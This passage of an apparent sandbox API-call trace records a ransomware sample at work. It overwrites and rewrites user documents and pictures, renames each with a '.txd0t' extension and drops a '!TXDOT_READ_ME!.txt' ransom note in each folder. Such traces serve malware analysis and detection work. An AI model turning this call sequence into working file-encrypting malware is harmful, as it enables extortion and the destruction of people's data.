lpNumberOfBytesWritten=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x53ef774*, lpNumberOfBytesWritten=0x53ef770*=0x2, lpOverlapped=0x0) returned 1 [0074.622] FlushFileBuffers (hFile=0x478) returned 1 [0074.623] WriteFile (in: hFile=0x478, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x53ef770*=0x7f0, lpOverlapped=0x0) returned 1 [0074.624] FlushFileBuffers (hFile=0x478) returned 1 [0074.625] CloseHandle (hObject=0x478) returned 1 [0074.625] GetProcessHeap () returned 0xe30000 [0074.625] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0074.625] CloseHandle (hObject=0x474) returned 1 [0074.628] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\8GgGCWAXxjKLpeoA40OY.odp" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\jdtkuz0ku8\\8gggcwaxxjklpeoa40oy.odp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\8GgGCWAXxjKLpeoA40OY.odp.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\jdtkuz0ku8\\8gggcwaxxjklpeoa40oy.odp.txd0t")) returned 1 [0074.628] SetEvent (hEvent=0x414) returned 1 [0074.628] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0074.629] StrCpyW (in: psz1=0x53ef790, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\hnSSITWu7H4.odt" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\hnSSITWu7H4.odt") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\hnSSITWu7H4.odt" [0074.629] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\hnSSITWu7H4.odt", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\hnSSITWu7H4.odt.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\hnSSITWu7H4.odt.txd0t" [0074.630] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\hnSSITWu7H4.odt.txd0t") returned 0 [0074.630] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\hnSSITWu7H4.odt", dwFileAttributes=0x80) returned 1 [0074.630] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\hnSSITWu7H4.odt" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\jdtkuz0ku8\\hnssitwu7h4.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0074.630] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=32463) returned 1 [0074.630] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.630] WriteFile (in: hFile=0x474, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0074.631] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff7f31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.631] ReadFile (in: hFile=0x474, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x7ec0, lpNumberOfBytesRead=0x53ef750, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef750*=0x7ec0, lpOverlapped=0x0) returned 1 [0074.632] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff8140, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.632] WriteFile (in: hFile=0x474, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x7ec0, lpNumberOfBytesWritten=0x53ef754, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef754*=0x7ec0, lpOverlapped=0x0) returned 1 [0074.632] FlushFileBuffers (hFile=0x474) returned 1 [0075.467] GetProcessHeap () returned 0xe30000 [0075.467] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x132) returned 0xe9b648 [0075.467] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\hnSSITWu7H4.odt" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\hnSSITWu7H4.odt") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\hnSSITWu7H4.odt" [0075.467] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\hnSSITWu7H4.odt") returned="hnSSITWu7H4.odt" [0075.467] StrCpyW (in: psz1=0xe9b6b4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0075.467] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\!TXDOT_READ_ME!.txt") returned 1 [0075.467] GetProcessHeap () returned 0xe30000 [0075.467] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0075.467] CloseHandle (hObject=0x474) returned 1 [0075.470] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\hnSSITWu7H4.odt" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\jdtkuz0ku8\\hnssitwu7h4.odt"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\hnSSITWu7H4.odt.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\jdtkuz0ku8\\hnssitwu7h4.odt.txd0t")) returned 1 [0075.470] SetEvent (hEvent=0x414) returned 1 [0075.472] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0075.472] StrCpyW (in: psz1=0x53ef7c0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\6to-Do2T3Y6Ag.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\6to-Do2T3Y6Ag.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\6to-Do2T3Y6Ag.jpg" [0075.472] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\6to-Do2T3Y6Ag.jpg", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\6to-Do2T3Y6Ag.jpg.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\6to-Do2T3Y6Ag.jpg.txd0t" [0075.472] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\6to-Do2T3Y6Ag.jpg.txd0t") returned 0 [0075.472] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\6to-Do2T3Y6Ag.jpg", dwFileAttributes=0x80) returned 1 [0075.473] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\6to-Do2T3Y6Ag.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\6to-do2t3y6ag.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0075.473] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=35466) returned 1 [0075.473] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.473] WriteFile (in: hFile=0x474, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0075.473] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff7376, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.473] ReadFile (in: hFile=0x474, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x8a80, lpNumberOfBytesRead=0x53ef780, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef780*=0x8a80, lpOverlapped=0x0) returned 1 [0075.474] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff7580, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.474] WriteFile (in: hFile=0x474, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x8a80, lpNumberOfBytesWritten=0x53ef784, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef784*=0x8a80, lpOverlapped=0x0) returned 1 [0075.475] FlushFileBuffers (hFile=0x474) returned 1 [0075.788] GetProcessHeap () returned 0xe30000 [0075.788] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x104) returned 0xe9d750 [0075.788] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\6to-Do2T3Y6Ag.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\6to-Do2T3Y6Ag.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\6to-Do2T3Y6Ag.jpg" [0075.788] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\6to-Do2T3Y6Ag.jpg") returned="6to-Do2T3Y6Ag.jpg" [0075.788] StrCpyW (in: psz1=0xe9d78a, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0075.788] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\!TXDOT_READ_ME!.txt") returned 0 [0075.788] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\pictures\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x47c [0075.788] WriteFile (in: hFile=0x47c, lpBuffer=0x53ef7b4*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x53ef7b0, lpOverlapped=0x0 | out: lpBuffer=0x53ef7b4*, lpNumberOfBytesWritten=0x53ef7b0*=0x2, lpOverlapped=0x0) returned 1 [0075.789] FlushFileBuffers (hFile=0x47c) returned 1 [0075.827] WriteFile (in: hFile=0x47c, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x53ef7b0, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x53ef7b0*=0x7f0, lpOverlapped=0x0) returned 1 [0075.839] FlushFileBuffers (hFile=0x47c) returned 1 [0075.868] CloseHandle (hObject=0x47c) returned 1 [0075.868] GetProcessHeap () returned 0xe30000 [0075.868] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0075.868] CloseHandle (hObject=0x474) returned 1 [0075.871] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\6to-Do2T3Y6Ag.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\6to-do2t3y6ag.jpg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\6to-Do2T3Y6Ag.jpg.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\6to-do2t3y6ag.jpg.txd0t")) returned 1 [0075.871] SetEvent (hEvent=0x414) returned 1 [0075.871] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0075.878] StrCpyW (in: psz1=0x53ef7c0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\dF_BgEryZj.gif" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\dF_BgEryZj.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\dF_BgEryZj.gif" [0075.878] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\dF_BgEryZj.gif", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\dF_BgEryZj.gif.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\dF_BgEryZj.gif.txd0t" [0075.878] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\dF_BgEryZj.gif.txd0t") returned 0 [0075.878] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\dF_BgEryZj.gif", dwFileAttributes=0x80) returned 1 [0075.878] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\dF_BgEryZj.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\df_bgeryzj.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0075.878] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=69410) returned 1 [0075.878] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.878] WriteFile (in: hFile=0x46c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0075.879] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffeeede, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.879] ReadFile (in: hFile=0x46c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x10f20, lpNumberOfBytesRead=0x53ef780, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef780*=0x10f20, lpOverlapped=0x0) returned 1 [0075.880] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffef0e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.880] WriteFile (in: hFile=0x46c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x10f20, lpNumberOfBytesWritten=0x53ef784, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef784*=0x10f20, lpOverlapped=0x0) returned 1 [0075.880] FlushFileBuffers (hFile=0x46c) returned 1 [0076.109] GetProcessHeap () returned 0xe30000 [0076.109] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xfe) returned 0xecf498 [0076.109] StrCpyW (in: psz1=0xecf498, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\dF_BgEryZj.gif" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\dF_BgEryZj.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\dF_BgEryZj.gif" [0076.109] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\dF_BgEryZj.gif") returned="dF_BgEryZj.gif" [0076.109] StrCpyW (in: psz1=0xecf4d2, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.109] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\!TXDOT_READ_ME!.txt") returned 1 [0076.109] GetProcessHeap () returned 0xe30000 [0076.109] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf498 | out: hHeap=0xe30000) returned 1 [0076.109] CloseHandle (hObject=0x46c) returned 1 [0076.112] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\dF_BgEryZj.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\df_bgeryzj.gif"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\dF_BgEryZj.gif.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\df_bgeryzj.gif.txd0t")) returned 1 [0076.112] SetEvent (hEvent=0x414) returned 1 [0076.112] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0076.113] StrCpyW (in: psz1=0x53ef7a0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\-aUMUjkCqPRwR9Vt.gif" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\-aUMUjkCqPRwR9Vt.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\-aUMUjkCqPRwR9Vt.gif" [0076.114] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\-aUMUjkCqPRwR9Vt.gif", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\-aUMUjkCqPRwR9Vt.gif.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\-aUMUjkCqPRwR9Vt.gif.txd0t" [0076.114] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\-aUMUjkCqPRwR9Vt.gif.txd0t") returned 0 [0076.114] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\-aUMUjkCqPRwR9Vt.gif", dwFileAttributes=0x80) returned 1 [0076.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\-aUMUjkCqPRwR9Vt.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\-aumujkcqprwr9vt.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0076.115] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=87966) returned 1 [0076.115] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.115] WriteFile (in: hFile=0x46c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0076.116] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffea662, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.116] ReadFile (in: hFile=0x46c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x15790, lpNumberOfBytesRead=0x53ef760, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef760*=0x15790, lpOverlapped=0x0) returned 1 [0076.118] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffea870, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.118] WriteFile (in: hFile=0x46c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x15790, lpNumberOfBytesWritten=0x53ef764, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef764*=0x15790, lpOverlapped=0x0) returned 1 [0076.118] FlushFileBuffers (hFile=0x46c) returned 1 [0076.140] GetProcessHeap () returned 0xe30000 [0076.140] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11e) returned 0xe9b648 [0076.140] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\-aUMUjkCqPRwR9Vt.gif" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\-aUMUjkCqPRwR9Vt.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\-aUMUjkCqPRwR9Vt.gif" [0076.140] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\-aUMUjkCqPRwR9Vt.gif") returned="-aUMUjkCqPRwR9Vt.gif" [0076.140] StrCpyW (in: psz1=0xe9b696, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.140] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\!TXDOT_READ_ME!.txt") returned 0 [0076.141] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x47c [0076.141] WriteFile (in: hFile=0x47c, lpBuffer=0x53ef794*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x53ef790, lpOverlapped=0x0 | out: lpBuffer=0x53ef794*, lpNumberOfBytesWritten=0x53ef790*=0x2, lpOverlapped=0x0) returned 1 [0076.142] FlushFileBuffers (hFile=0x47c) returned 1 [0076.148] WriteFile (in: hFile=0x47c, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x53ef790, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x53ef790*=0x7f0, lpOverlapped=0x0) returned 1 [0076.162] FlushFileBuffers (hFile=0x47c) returned 1 [0076.193] CloseHandle (hObject=0x47c) returned 1 [0076.196] GetProcessHeap () returned 0xe30000 [0076.196] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0076.196] CloseHandle (hObject=0x46c) returned 1 [0076.198] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\-aUMUjkCqPRwR9Vt.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\-aumujkcqprwr9vt.gif"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\-aUMUjkCqPRwR9Vt.gif.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\-aumujkcqprwr9vt.gif.txd0t")) returned 1 [0076.201] SetEvent (hEvent=0x414) returned 1 [0076.201] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0076.204] StrCpyW (in: psz1=0x53ef7a0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\EVRLdIxDOIvB-Fc9_h.gif" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\EVRLdIxDOIvB-Fc9_h.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\EVRLdIxDOIvB-Fc9_h.gif" [0076.204] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\EVRLdIxDOIvB-Fc9_h.gif", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\EVRLdIxDOIvB-Fc9_h.gif.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\EVRLdIxDOIvB-Fc9_h.gif.txd0t" [0076.204] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\EVRLdIxDOIvB-Fc9_h.gif.txd0t") returned 0 [0076.204] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\EVRLdIxDOIvB-Fc9_h.gif", dwFileAttributes=0x80) returned 1 [0076.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\EVRLdIxDOIvB-Fc9_h.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\evrldixdoivb-fc9_h.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0076.204] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=73432) returned 1 [0076.204] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.204] WriteFile (in: hFile=0x47c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0076.205] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffedf28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.205] ReadFile (in: hFile=0x47c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x11ed0, lpNumberOfBytesRead=0x53ef760, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef760*=0x11ed0, lpOverlapped=0x0) returned 1 [0076.207] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffee130, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.207] WriteFile (in: hFile=0x47c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x11ed0, lpNumberOfBytesWritten=0x53ef764, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef764*=0x11ed0, lpOverlapped=0x0) returned 1 [0076.207] FlushFileBuffers (hFile=0x47c) returned 1 [0076.212] GetProcessHeap () returned 0xe30000 [0076.212] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x122) returned 0xe9b648 [0076.212] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\EVRLdIxDOIvB-Fc9_h.gif" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\EVRLdIxDOIvB-Fc9_h.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\EVRLdIxDOIvB-Fc9_h.gif" [0076.212] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\EVRLdIxDOIvB-Fc9_h.gif") returned="EVRLdIxDOIvB-Fc9_h.gif" [0076.212] StrCpyW (in: psz1=0xe9b696, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.212] PathFileExistsW 